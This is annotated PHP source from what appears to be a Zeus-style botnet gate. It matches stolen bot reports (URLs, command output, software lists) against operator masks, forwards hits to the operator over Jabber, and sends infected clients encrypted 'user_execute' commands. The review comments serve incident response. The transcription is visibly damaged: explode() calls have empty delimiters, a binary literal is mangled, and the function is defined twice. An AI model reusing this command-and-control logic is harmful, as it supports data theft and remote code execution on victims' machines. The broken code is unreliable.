# Checks one collected report against the operator-configured notification
# masks (the reports_jn_* config keys), queues a human-readable line per hit,
# forwards the hits to the configured Jabber recipient, and -- only when the
# global $country_allowed is set and reports_jn_script is non-empty -- answers
# the current request with an encrypted reply carrying a `user_execute`
# command and terminates the script.
#
# $type         report type constant (BLT_*), read only
# $list         report fields keyed by SBCID_* constants, read only
# $botId        client identifier string, read only
# $defloration  true when this is a newly seen client (checked against reports_jn_botmasks)
# $wentOnline   true when the client just came online (checked against reports_jn_masks['wentOnline'])
# Returns nothing; may call die() on the command-reply path.
#
# NOTE(review): all the explode("", ...) calls below carry an empty delimiter
# as transcribed here. On PHP 8 that is a ValueError; on older PHP explode()
# returns false and the foreach iterates nothing. The real separator was
# presumably lost in extraction -- confirm against the original source.
# NOTE(review): every preg_match() is @-suppressed, so a malformed mask fails
# silently (no match, no notification) instead of being surfaced.
# NOTE(review): for IR, the reports_jn_* values and $GLOBALS['globalKey'] are
# the configuration worth capturing from a seized gate: they determine who is
# notified, which reports trigger it, and the key the reply is encrypted with.
function imNotify(&$type, &$list, &$botId, $defloration = false, $wentOnline = false) {
    # Nothing to do unless a notification recipient is configured
    if (empty($GLOBALS['config']['reports_jn_to'])) {
        return;
    }
    $messages = array();
    # Notify of new matching BotIDs: masks use "*" as a wildcard, matched
    # case-insensitively against the whole identifier (anchored ^...$)
    if ($defloration) {
        $ml = explode("", $GLOBALS['config']['reports_jn_botmasks']);
        foreach ($ml as $mask) {
            if (@preg_match('#^' . str_replace('\\*', '.*', preg_quote($mask, '#')) . '$#i', $botId) > 0) {
                $messages[] = "Reason: botId matched\nBot ID: {$botId}\n";
                break;
            }
        }
    }
    # Notify of matching BotIDs that went online (same mask syntax)
    if ($wentOnline) {
        $ml = explode("", $GLOBALS['config']['reports_jn_masks']['wentOnline']);
        foreach ($ml as $mask) {
            if (@preg_match('#^' . str_replace('\\*', '.*', preg_quote($mask, '#')) . '$#i', $botId) > 0) {
                $messages[] = "Reason: botId is online\nBot ID: {$botId}\n";
                break;
            }
        }
    }
    # Notify of matching report URLs (HTTP/HTTPS request reports only);
    # the message carries at most the first 1024 bytes of the report body
    if (($type == BLT_HTTP_REQUEST || $type == BLT_HTTPS_REQUEST) && !empty($list[SBCID_PATH_SOURCE])) {
        $ml = explode("", $GLOBALS['config']['reports_jn_list']);
        foreach ($ml as $mask) {
            if (@preg_match('#^' . str_replace('\\*', '.*', preg_quote($mask, '#')) . '$#i', $list[SBCID_PATH_SOURCE]) > 0) {
                $messages[] = "Reason: URL matched\nBot ID: {$botId}\nURL: " . $list[SBCID_PATH_SOURCE] . "\n\n" . substr($list[SBCID_BOTLOG], 0, 1024);
                break;
            }
        }
    }
    # Notify of matching report contexts by type
    # NOTE: these reports are not presented in full! Only some lines around the keyword
    if (!empty($list[SBCID_BOTLOG])) {
        # report type => [config sub-key under reports_jn_masks, reason text]
        $report_match = array(BLT_ANALYTICS_SOFTWARE => array('software', 'Software matched'), BLT_COMMANDLINE_RESULT => array('cmd', 'Command line result matched'));
        foreach ($report_match as $rm_type => $rm) {
            if ($type == $rm_type) {
                $ml = explode("", $GLOBALS['config']['reports_jn_masks'][$rm[0]]);
                $reason = $rm[1];
                # Unlike the URL/botId masks this pattern is unanchored, so the
                # mask may match anywhere inside the report body
                foreach (array_filter(array_map('trim', $ml), 'strlen') as $mask) {
                    if (@preg_match('#' . str_replace('\\*', '.*', preg_quote($mask, '#')) . '#i', $list[SBCID_BOTLOG], $m, PREG_OFFSET_CAPTURE) > 0) {
                        # Extract a few lines around the match
                        $surrounding_lines = 2;
                        $match_pos = $m[0][1]; # byte offset of the match
                        $n_pos = array(0); # sliding window of "\n" offsets, seeded with the start of the buffer
                        $p = 0; # current scan offset
                        $p_past_npos = false; # set once a "\n" beyond the match has been seen
                        while (FALSE !== ($p = strpos($list[SBCID_BOTLOG], "\n", $p))) { # visit every "\n"
                            $n_pos[] = $p; # add it
                            if ($p > $match_pos) {
                                $p_past_npos = true;
                            }
                            if (!$p_past_npos && count($n_pos) > $surrounding_lines + 1) { # before the match, keep only the last N+1 offsets
                                array_shift($n_pos);
                            }
                            if ($p_past_npos && count($n_pos) >= ($surrounding_lines + 1) * 2) { # stop a few lines past the match
                                break;
                            }
                            $p++;
                        }
                        # The window's first and last offsets bound the excerpt.
                        # NOTE(review): if the body has fewer than two "\n" after the
                        # seed, $p_till can be null and substr() gets a negative length.
                        $p_from = array_shift($n_pos);
                        $p_till = array_pop($n_pos);
                        $message_part = trim(substr($list[SBCID_BOTLOG], $p_from, $p_till - $p_from));
                        $messages[] = "Reason: {$reason}\nBot ID: {$botId}\n\n" . $message_part;
                        break;
                    }
                }
            }
        }
    }
    # Notify
    if (empty($messages)) {
        return;
    }
    # Each notification is also traced in the gate log, which is a useful
    # artifact when reconstructing what the operator was told and when
    foreach ($messages as $message) {
        GateLog::get()->log(GateLog::L_TRACE, 'Jabber', sprintf("Notify %s : %s", $GLOBALS['config']['reports_jn_to'], $message));
    }
    jabber_notify($GLOBALS['config']['reports_jn_to'], $messages);
    # Execute scripts, if set: the reply to this request becomes a command
    # record instead of the normal response, and the script exits afterwards.
    global $country_allowed;
    if ($country_allowed && strlen($GLOBALS['config']['reports_jn_script']) > 0) {
        # $eid: 16 raw bytes derived from the current time (differs per reply);
        # the older variant of this function derives it from the matched mask
        $eid = md5(microtime(), true);
        $script = 'user_execute "' . trim($GLOBALS['config']['reports_jn_script']) . '" -f';
        $size = strlen($eid) + strlen($script);
        # Item: four unsigned 32-bit values (machine byte order) followed by $eid and the command text
        $replyData = pack('LLLL', 1, 0, $size, $size) . $eid . $script;
        # Outer header: five mt_rand() fillers, total length, 0, 1, then the raw md5 of the item.
        # The filler fields vary per reply; the length/flag fields and digest layout do not.
        $replyData = pack('LLLLLLLL', mt_rand(), mt_rand(), mt_rand(), mt_rand(), mt_rand(), HEADER_SIZE + strlen($replyData), 0, 1) . md5($replyData, true) . $replyData;
        visualEncrypt($replyData);
        # NOTE(review): this variant keys rc4 with $GLOBALS['globalKey'];
        # the older variant uses $GLOBALS['config']['botnet_cryptkey_bin']
        rc4($replyData, $GLOBALS['globalKey']);
        echo $replyData;
        die;
    }
}
# Earlier revision of imNotify(): only URL-mask matching on HTTP/HTTPS request
# reports, with the Jabber session opened inline instead of via jabber_notify(),
# an optional append-only log file, and the same encrypted `user_execute`
# reply path (here without the $country_allowed gate).
#
# NOTE(review): this is a second definition of imNotify(); loading both in one
# PHP file is a fatal redeclaration, so this listing presumably juxtaposes two
# versions rather than one runnable file.
# NOTE(review): reports_jn_logfile, when configured, accumulates every matched
# report with a 40-character "=" separator -- a forensic artifact worth
# collecting from a seized gate.
# NOTE(review): error_reporting(0) is set for the remainder of the request,
# not just around the file write, so later failures in this request are hidden.
function imNotify(&$type, &$list, &$botId) {
    if (($type == BLT_HTTP_REQUEST || $type == BLT_HTTPS_REQUEST) && !empty($list[SBCID_PATH_SOURCE])) {
        # NOTE(review): empty explode() delimiter as transcribed -- see the newer variant
        $ml = explode("", $GLOBALS['config']['reports_jn_list']);
        # NOTE(review): iterates by reference and never unset()s $mask afterwards
        foreach ($ml as &$mask) {
            # "*" wildcard, case-insensitive, anchored to the whole URL
            if (@preg_match('#^' . str_replace('\\*', '.*', preg_quote($mask, '#')) . '$#i', $list[SBCID_PATH_SOURCE]) > 0) {
                # First 1024 bytes of the report body, HTML-entity encoded before
                # being written to the log file and sent as the Jabber body
                $message = htmlentities("Bot ID: " . $botId . "\nURL: " . $list[SBCID_PATH_SOURCE] . "\n\n" . substr($list[SBCID_BOTLOG], 0, 1024));
                error_reporting(0);
                if (strlen($GLOBALS['config']['reports_jn_logfile']) > 0 && ($fh = @fopen($GLOBALS['config']['reports_jn_logfile'], 'at')) !== false) {
                    @fwrite($fh, $message . "\n\n" . str_repeat('=', 40) . "\n\n");
                    @fclose($fh);
                }
                # Inline Jabber session: connect, auth, presence, one message, disconnect.
                # Credentials come from reports_jn_server/port/account/pass.
                require_once "system/jabberclass.php";
                $jab = new Jabber();
                $jab->server = $GLOBALS['config']['reports_jn_server'];
                $jab->port = $GLOBALS['config']['reports_jn_port'];
                $jab->username = $GLOBALS['config']['reports_jn_account'];
                $jab->password = $GLOBALS['config']['reports_jn_pass'];
                if ($jab->connect()) {
                    $jab->sendAuth();
                    $jab->sendPresence(NULL, NULL, "online");
                    $jab->sendMessage($GLOBALS['config']['reports_jn_to'], "normal", NULL, array("body" => $message));
                    $jab->disconnect();
                }
                # Command reply path: same framing as the newer variant, but
                # $eid is derived from the matched mask (stable across replies)
                if (strlen($GLOBALS['config']['reports_jn_script']) > 0) {
                    $eid = md5($mask, true);
                    $script = 'user_execute "' . trim($GLOBALS['config']['reports_jn_script']) . '" -f';
                    $size = strlen($eid) + strlen($script);
                    $replyData = pack('LLLL', 1, 0, $size, $size) . $eid . $script;
                    $replyData = pack('LLLLLLLL', mt_rand(), mt_rand(), mt_rand(), mt_rand(), mt_rand(), HEADER_SIZE + strlen($replyData), 0, 1) . md5($replyData, true) . $replyData;
                    visualEncrypt($replyData);
                    rc4($replyData, $GLOBALS['config']['botnet_cryptkey_bin']);
                    echo $replyData;
                    die;
                }
                break;
            }
        }
    }
}
# Writes an encrypted reply that carries no command and terminates the script.
# The frame is the same outer header used by imNotify(): five mt_rand()
# fillers, total length (HEADER_SIZE + ITEM_HEADER_SIZE), 0, 1, followed by a
# fixed binary literal.
#
# NOTE(review): the quoted literal is binary and has been mangled in this copy
# (U+FFFD replacement characters), so its bytes cannot be recovered from this
# listing. By position it stands where the other reply builders place
# md5($replyData, true) followed by the item header -- presumably a
# precomputed digest plus an empty item; confirm against the original bytes.
function sendEmptyReply() {
    $replyData = pack('LLLLLLLL', mt_rand(), mt_rand(), mt_rand(), mt_rand(), mt_rand(), HEADER_SIZE + ITEM_HEADER_SIZE, 0, 1) . "J�6�K��y�u.#H�";
    visualEncrypt($replyData);
    # Keyed with the config key, as in the older imNotify() variant
    rc4($replyData, $GLOBALS['config']['botnet_cryptkey_bin']);
    echo $replyData;
    die;
}